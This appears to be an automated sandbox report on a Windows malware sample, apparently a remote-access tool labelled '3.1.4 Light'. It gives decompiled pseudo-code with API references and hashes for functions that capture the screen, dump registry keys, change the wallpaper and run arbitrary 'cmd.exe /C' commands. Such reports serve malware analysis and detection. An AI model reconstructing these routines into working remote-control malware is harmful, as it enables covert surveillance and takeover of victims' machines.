                                              • Part of subcall function 00436F33: RtlAllocateHeap.NTDLL(00000000,0042979C,?,?,0042AEE7,?,?,3.1.4 Light,?,?,0040869A,0042979C,?,?,?,?), ref: 00436F65
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0043CE1C
                                            • _free.LIBCMT ref: 0043CE2F
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0043CE3E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                            • String ID:
                                            • API String ID: 336800556-0
                                            • Opcode ID: c02b4f635d5afb2f5795b6c29d01fd5883d9d707a337ff55b3539eafa3e0db26
                                            • Instruction ID: 986a9dd94c521713549aca0b18372dd782520bab3b4e4451b6f587e9e9cc1fd2
                                            • Opcode Fuzzy Hash: c02b4f635d5afb2f5795b6c29d01fd5883d9d707a337ff55b3539eafa3e0db26
                                            • Instruction Fuzzy Hash: 1201D8766016217B332117766CCDC7F7A6DDACBBA0B14112AF804D2200DE688C0292B8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043E42C, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0043E42C(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x45f188; // 0x45f180
					if(_t23 != 0) {
						E00437795(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x45f18c; // 0x46063c
					if(_t24 != 0) {
						E00437795(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x45f190; // 0x46063c
					if(_t25 != 0) {
						E00437795(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x45f1b8; // 0x45f184
					if(_t26 != 0) {
						E00437795(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x45f1bc; // 0x460640
					if(_t27 != 0) {
						return E00437795(_t6);
					}
				}
				return _t6;
			}










                                            0x0043e432
                                            0x0043e437
                                            0x0043e43b
                                            0x0043e441
                                            0x0043e444
                                            0x0043e449
                                            0x0043e44d
                                            0x0043e453
                                            0x0043e456
                                            0x0043e45b
                                            0x0043e45f
                                            0x0043e465
                                            0x0043e468
                                            0x0043e46d
                                            0x0043e471
                                            0x0043e477
                                            0x0043e47a
                                            0x0043e47f
                                            0x0043e480
                                            0x0043e483
                                            0x0043e489
                                            0x00000000
                                            0x0043e491
                                            0x0043e489
                                            0x0043e494

                                            APIs
                                            • _free.LIBCMT ref: 0043E444
                                              • Part of subcall function 00437795: HeapFree.KERNEL32(00000000,00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000), ref: 004377AB
                                              • Part of subcall function 00437795: GetLastError.KERNEL32(00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000,00000000), ref: 004377BD
                                            • _free.LIBCMT ref: 0043E456
                                            • _free.LIBCMT ref: 0043E468
                                            • _free.LIBCMT ref: 0043E47A
                                            • _free.LIBCMT ref: 0043E48C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 0a910c48c5b5a3f80f49e0386c89ebed9220b15fc667ef864cbefa5431d06368
                                            • Instruction ID: ce86589f49000415f7541ca3aaa8a639e445681e0aed58f2ce05ab3cf54dccd7
                                            • Opcode Fuzzy Hash: 0a910c48c5b5a3f80f49e0386c89ebed9220b15fc667ef864cbefa5431d06368
                                            • Instruction Fuzzy Hash: 31F06872506710E7C660EB66F5C1C0773EAAA5D754F58981BF044D7682DB38FC814A5C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043508F, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E0043508F(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x45f900; // 0x489478
					if(_t7 != 0x45f6e0) {
						E00437795(_t7);
						 *0x45f900 = 0x45f6e0;
					}
				}
				E00437795( *0x460928);
				 *0x460928 = 0;
				E00437795( *0x46092c);
				 *0x46092c = 0;
				E00437795( *0x460958);
				 *0x460958 = 0;
				E00437795( *0x46095c);
				 *0x46095c = 0;
				return 1;
			}




                                            0x00435098
                                            0x0043509c
                                            0x0043509e
                                            0x004350aa
                                            0x004350ad
                                            0x004350b3
                                            0x004350b3
                                            0x004350aa
                                            0x004350bf
                                            0x004350cc
                                            0x004350d2
                                            0x004350dd
                                            0x004350e3
                                            0x004350ee
                                            0x004350f4
                                            0x004350fc
                                            0x00435105

                                            APIs
                                            • _free.LIBCMT ref: 004350AD
                                              • Part of subcall function 00437795: HeapFree.KERNEL32(00000000,00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000), ref: 004377AB
                                              • Part of subcall function 00437795: GetLastError.KERNEL32(00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000,00000000), ref: 004377BD
                                            • _free.LIBCMT ref: 004350BF
                                            • _free.LIBCMT ref: 004350D2
                                            • _free.LIBCMT ref: 004350E3
                                            • _free.LIBCMT ref: 004350F4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: d8bfbfa434928ebed4f96fa403d66234553dcf8de3b3819521c9b371bfd2b300
                                            • Instruction ID: c1d1a981e9a20b62f88c62bb6112d1ae3edef5f27eced7c4cb6021d8b43b5b73
                                            • Opcode Fuzzy Hash: d8bfbfa434928ebed4f96fa403d66234553dcf8de3b3819521c9b371bfd2b300
                                            • Instruction Fuzzy Hash: FAF067F08176209BD6666F26AC8140B3B26A70D760704143BF8445B2B3F7B9A8498FCF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040ED58, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 248COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E0040ED58(signed int __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v112;
				intOrPtr _v116;
				intOrPtr _v144;
				char _v196;
				char _v220;
				void* _v224;
				char _v244;
				void* _v248;
				char _v268;
				void* _v272;
				char _v292;
				void* _v296;
				char _v300;
				char _v308;
				char _v316;
				void* _v320;
				char* _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				char _v340;
				void* _v344;
				void* _v352;
				intOrPtr _v356;
				char _v364;
				void* _v368;
				char _v380;
				char _v384;
				void* _v392;
				char _v404;
				signed int _v432;
				char _v448;
				char _v452;
				void* _v476;
				char _v480;
				intOrPtr _v484;
				char _v492;
				char _v500;
				char _v504;
				char _v512;
				char _v516;
				void* __ebx;
				void* __edi;
				intOrPtr* _t63;
				void* _t98;
				void* _t99;
				intOrPtr* _t125;
				char* _t134;
				intOrPtr _t191;
				intOrPtr* _t202;
				signed int _t217;
				void* _t219;
				void* _t220;

				_t186 = __edx;
				_t219 = (_t217 & 0xfffffff8) - 0x1ac;
				 *0x460cf4 = _a4;
				_v432 = __ecx & 0x000000ff;
				E0040F0BD( &_v380, __edx, __eflags, _a4);
				if(E00401F26() != 0) {
					_t134 =  &_v380;
					_t63 =  *0x460ca0(E00401F2E(_t134), E00401F26());
					_t125 = _t63;
					E0040EBFB( &_v364, _t125);
					E0040F429( &_v300);
					_v356 = 1;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v336 = 1;
					_v332 = 4;
					_v328 =  &_v448;
					_t202 =  *0x460ca0(0, 0, _t134);
					E0040EC73( &_v308,  &_v380, _t202,  &_v308,  &_v364);
					 *((intOrPtr*)( *_t202 + 0x30))(_t202,  &_v112, 1);
					E00402054(_t125,  &_v452,  &_v300, _t202, _v116, 0);
					asm("xorps xmm0, xmm0");
					asm("movlpd [esp+0x18], xmm0");
					 *((intOrPtr*)( *_t202 + 0x14))(_t202, _v484, _v480, 0, 0);
					 *((intOrPtr*)( *_t202 + 0xc))(_t202, E00401F2E( &_v480), _v144, 0);
					 *((intOrPtr*)( *_t125 + 8))(_t125);
					 *((intOrPtr*)( *_t202 + 8))(_t202);
					E004331FF( &_v504, E00401F26(),  &_v516, 0xa);
					_t220 = _t219 + 0xc;
					__eflags =  *0x460cd9 - 1;
					if( *0x460cd9 != 1) {
						__eflags =  *0x46152c - 0xffffffff;
						if(__eflags != 0) {
							E00404095(_t125, _t220 - 0x18, E004059DC( &_v384,  &_v492, __eflags, 0x46103c), __eflags,  &_v480);
							_push(0x4d);
							E00401790(_t125, 0x461528, _t88, __eflags);
						} else {
							E00401677(0x461528);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E004016F4( &_v300);
							E00401879(0x461528, E0040F733);
							_t98 = E00411191( &_v404, 0x461510);
							_t191 =  *0x460cf0; // 0x0
							_t99 = E0041107C(0x461528,  &_v196, _t191);
							E00405870(_t220 - 0xfffffffffffffff8, E00404095(0x461528,  &_v364, E00405870( &_v340, E00404095(0x461528,  &_v316, E00404095(0x461528,  &_v292, E00404095(0x461528,  &_v268, E00404095(0x461528,  &_v244, E004059DC( &_v220,  &_v512, __eflags, 0x46103c), __eflags,  &_v500), __eflags, 0x46103c), __eflags, 0x4614e0), __eflags, 0x46103c), _t99), __eflags, 0x46103c), _t98);
							_push(0x10);
							E00401790(0x461528, 0x461528, _t107, __eflags);
							E00401F97();
							E00401F97();
							E00401F97();
							E00401F97();
							E00401F97();
							E00401F97();
							E00401F97();
							E00401F97();
						}
						E00401F97();
					} else {
						E00401AF7(0x461528);
					}
					E0040EC21(E00401F97(),  &_v452);
				} else {
					if( *0x460cd9 != 1) {
						__eflags =  *0x46152c - 0xffffffff;
						if(__eflags == 0) {
							E00401677(0x461528);
							_t219 = _t219 - 0x10;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E004016F4(__edx);
						}
						E004020E6(0x461528, _t219 - 0x18, _t186, __eflags, 0x4614e0);
						_push(0x4e);
						E00401790(0x461528, 0x461528, _t186, __eflags);
					} else {
						E00401AF7(0x461528);
					}
				}
				return E00401F97();
			}























































                                            0x0040ed58
                                            0x0040ed5e
                                            0x0040ed72
                                            0x0040ed78
                                            0x0040ed7c
                                            0x0040ed8d
                                            0x0040edf8
                                            0x0040ee02
                                            0x0040ee09
                                            0x0040ee10
                                            0x0040ee1c
                                            0x0040ee2d
                                            0x0040ee31
                                            0x0040ee32
                                            0x0040ee33
                                            0x0040ee34
                                            0x0040ee37
                                            0x0040ee40
                                            0x0040ee4c
                                            0x0040ee59
                                            0x0040ee6d
                                            0x0040ee7f
                                            0x0040ee8e
                                            0x0040ee95
                                            0x0040ee9a
                                            0x0040eea9
                                            0x0040eec2
                                            0x0040eec8
                                            0x0040eece
                                            0x0040eee2
                                            0x0040eee7
                                            0x0040eeea
                                            0x0040eef1
                                            0x0040ef02
                                            0x0040ef09
                                            0x0040f07d
                                            0x0040f083
                                            0x0040f08a
                                            0x0040ef0f
                                            0x0040ef16
                                            0x0040ef27
                                            0x0040ef28
                                            0x0040ef29
                                            0x0040ef2a
                                            0x0040ef2b
                                            0x0040ef37
                                            0x0040ef48
                                            0x0040ef4d
                                            0x0040ef66
                                            0x0040efe8
                                            0x0040efee
                                            0x0040eff2
                                            0x0040effe
                                            0x0040f00a
                                            0x0040f016
                                            0x0040f022
                                            0x0040f02e
                                            0x0040f03a
                                            0x0040f046
                                            0x0040f052
                                            0x0040f052
                                            0x0040f096
                                            0x0040eef3
                                            0x0040eef8
                                            0x0040eef8
                                            0x0040f0a8
                                            0x0040ed8f
                                            0x0040ed96
                                            0x0040eda7
                                            0x0040edb3
                                            0x0040edb7
                                            0x0040edbc
                                            0x0040edc8
                                            0x0040edc9
                                            0x0040edca
                                            0x0040edcb
                                            0x0040edcc
                                            0x0040edcc
                                            0x0040eddb
                                            0x0040ede0
                                            0x0040ede4
                                            0x0040ed98
                                            0x0040ed9d
                                            0x0040ed9d
                                            0x0040ed96
                                            0x0040f0bc

                                            APIs
                                              • Part of subcall function 0040F0BD: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040F0D8
                                              • Part of subcall function 0040F0BD: CreateCompatibleDC.GDI32(00000000), ref: 0040F0E4
                                            • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 0040EE02
                                            • SHCreateMemStream.SHLWAPI(00000000), ref: 0040EE53
                                              • Part of subcall function 00401AF7: closesocket.WS2_32(000000FF), ref: 00401AFD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Create$Stream$Compatibleclosesocket
                                            • String ID: hF$hF
                                            • API String ID: 3038386933-1608121773
                                            • Opcode ID: 8614cb8259e438169907904e93dd1101062469169c66ef8c6b3dabd547eaa145
                                            • Instruction ID: 1d2473645048359bbe0eb0c77efda0a0cf35719bc1b4901deca9e43cf8d4bf81
                                            • Opcode Fuzzy Hash: 8614cb8259e438169907904e93dd1101062469169c66ef8c6b3dabd547eaa145
                                            • Instruction Fuzzy Hash: 2681C1326043419BC324FB61C841AAFB7A5AFC5318F40493FF586A71E1EF789949CB4A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040BB95, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E0040BB95(void* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				char _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t110;
				void* _t141;
				int _t145;
				int _t147;
				void* _t148;
				void* _t149;

				_t112 = __ecx;
				E00447190();
				_push(_t141);
				_t145 = 0;
				_t110 = __ecx;
				E0042B710(_t141,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							E00405B9B(E00408507(_t110,  &_v108,  &_v668, _t141, _t152, E004031DB(_t110,  &_v56, "\n")));
							E004031D1();
							_t112 =  &_v56;
							E004031D1();
						}
						_t145 = _t145 + 1;
					} while (_t145 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t147 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E004331FF(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E00405B9B(E00408507(_t110,  &_v56,  &_v43956,  &_v95, _t156, E004031DB(_t110,  &_v132, "\n")));
								E004031D1();
								E004031D1();
								E00401F74(E004059B8(_t110,  &_v132,  &_v96,  &_v95, _t156, E0040207E(_t110,  &_v56, "\n")));
								E00401F97();
								E00401F97();
								_t93 = E0040207E(_t110,  &_v156, "[regsplt]");
								E00401F74(E00405870( &_v132, E004020A5(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
								E00401F97();
								E00401F97();
								_t112 =  &_v156;
								_t73 = E00401F97();
							}
							_t147 = _t147 + 1;
						} while (_t147 < _v20);
					}
				}
				return _t73;
			}






































                                            0x0040bb95
                                            0x0040bb9d
                                            0x0040bba4
                                            0x0040bbaa
                                            0x0040bbb4
                                            0x0040bbb6
                                            0x0040bbbb
                                            0x0040bbbe
                                            0x0040bbc8
                                            0x0040bbcb
                                            0x0040bbfc
                                            0x0040bc02
                                            0x0040bc07
                                            0x0040bc0d
                                            0x0040bc10
                                            0x0040bc2b
                                            0x0040bc31
                                            0x0040bc33
                                            0x0040bc58
                                            0x0040bc60
                                            0x0040bc65
                                            0x0040bc68
                                            0x0040bc68
                                            0x0040bc6d
                                            0x0040bc6e
                                            0x0040bc0d
                                            0x0040bc73
                                            0x0040bc78
                                            0x0040bc7e
                                            0x0040bc82
                                            0x0040bc88
                                            0x0040bc8a
                                            0x0040bc91
                                            0x0040bc98
                                            0x0040bc99
                                            0x0040bca0
                                            0x0040bca1
                                            0x0040bca3
                                            0x0040bca6
                                            0x0040bccb
                                            0x0040bcd1
                                            0x0040bcd3
                                            0x0040bce2
                                            0x0040bce7
                                            0x0040bd0d
                                            0x0040bd15
                                            0x0040bd1d
                                            0x0040bd42
                                            0x0040bd4a
                                            0x0040bd52
                                            0x0040bd62
                                            0x0040bd8b
                                            0x0040bd93
                                            0x0040bd9b
                                            0x0040bda0
                                            0x0040bda6
                                            0x0040bda6
                                            0x0040bdab
                                            0x0040bdac
                                            0x0040bc88
                                            0x0040bc82
                                            0x0040bdbb

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Enum$InfoQueryValue
                                            • String ID: [regsplt]
                                            • API String ID: 3554306468-4262303796
                                            • Opcode ID: 1c6c241f860aeada95cad5dfc9ed6368d1763f1f1419b53e1ae3ad075e52afc2
                                            • Instruction ID: 926fe3c511c3ce1bccb2e2c237d2874b43c4033cfd8ead246d1b87f6df97d156
                                            • Opcode Fuzzy Hash: 1c6c241f860aeada95cad5dfc9ed6368d1763f1f1419b53e1ae3ad075e52afc2
                                            • Instruction Fuzzy Hash: 72511E71A00219AADB10EB91DC95EEFBB7CEF05304F50017AF505F6191EF786A48CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00411A6A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            • SystemParametersInfoW.USER32 ref: 00411B5F
                                              • Part of subcall function 0040B917: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040B926
                                              • Part of subcall function 0040B917: RegSetValueExA.KERNELBASE(?,00455EC4,00000000,?,00000000,00000000,00461210,?,?,004098D7,00455EC4,3.1.4 Light), ref: 0040B94E
                                              • Part of subcall function 0040B917: RegCloseKey.KERNELBASE(?,?,?,004098D7,00455EC4,3.1.4 Light), ref: 0040B959
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCreateInfoParametersSystemValue
                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                            • API String ID: 4127273184-3576401099
                                            • Opcode ID: d1f61bcf95ccc3ec54b41cd1255546fc1e4bb83a2a8f1b73c43a98135ed4cef0
                                            • Instruction ID: c551f561ed70d3e756ffe8e89ff82a0a37ff23562b89f55f5dfa7c67d6ed0d39
                                            • Opcode Fuzzy Hash: d1f61bcf95ccc3ec54b41cd1255546fc1e4bb83a2a8f1b73c43a98135ed4cef0
                                            • Instruction Fuzzy Hash: 9A114271B8030032D914317A4D1BFAE2802D782B51F64015BFB063A7DBE6DE1E5942DF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040907A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004090E8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                            • API String ID: 2005118841-1866435925
                                            • Opcode ID: 6fb9ac811a6ea46ae3047d255a1d4daa763c002a4a70ce462adc51d2b2ea6544
                                            • Instruction ID: 4b45b8b3fde1f5dd30eed5f6fb35c23234789e56b3a620b577ea35391ee777dc
                                            • Opcode Fuzzy Hash: 6fb9ac811a6ea46ae3047d255a1d4daa763c002a4a70ce462adc51d2b2ea6544
                                            • Instruction Fuzzy Hash: E9012170A043086AE710E691CC07FBF37689B20305F24802FBE15B91C3EA7D6C0686AE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040D48A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040D48A(void* __edx, void* __edi, void* __ebp, void* __eflags, char _a16, char _a68, void* _a96, char _a100, void* _a128, void* _a152) {

				_t42 = __eflags;
				ShellExecuteW(0, L"open", L"cmd.exe", L00404090(E00408507(0,  &_a68, L"/C ", __edi, _t42, E004031DB(0,  &_a100, E00401F2E(E004031A1( &_a16, __edx, __eflags, 0))))), 0, 0);
				E004031D1();
				E004031D1();
				E004031CC( &_a16);
				E00401F97();
				E00401F97();
				return 0;
			}



                                            0x0040d48a
                                            0x0040d4cc
                                            0x0040d4d6
                                            0x0040dd79
                                            0x0040deba
                                            0x0040dec6
                                            0x0040ded2
                                            0x0040dedf

                                            APIs
                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0040D4CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID: /C $cmd.exe$open
                                            • API String ID: 587946157-3896048727
                                            • Opcode ID: 12e5c92a43e4ea07255e88e772fc87b2d3df5af7f396131fd8802ed5a485f62d
                                            • Instruction ID: b020aa45d7e03298ea8749ddb2339e00194cdfa8b116da8696afde4746ff0341
                                            • Opcode Fuzzy Hash: 12e5c92a43e4ea07255e88e772fc87b2d3df5af7f396131fd8802ed5a485f62d
                                            • Instruction Fuzzy Hash: 62F086712183015AC304FB71DC919BF7798AF9530AF10093FB546A60D2DF3C6909865A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00438F94, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00438F94(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E0042F367(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xfffffd30
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00447240( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
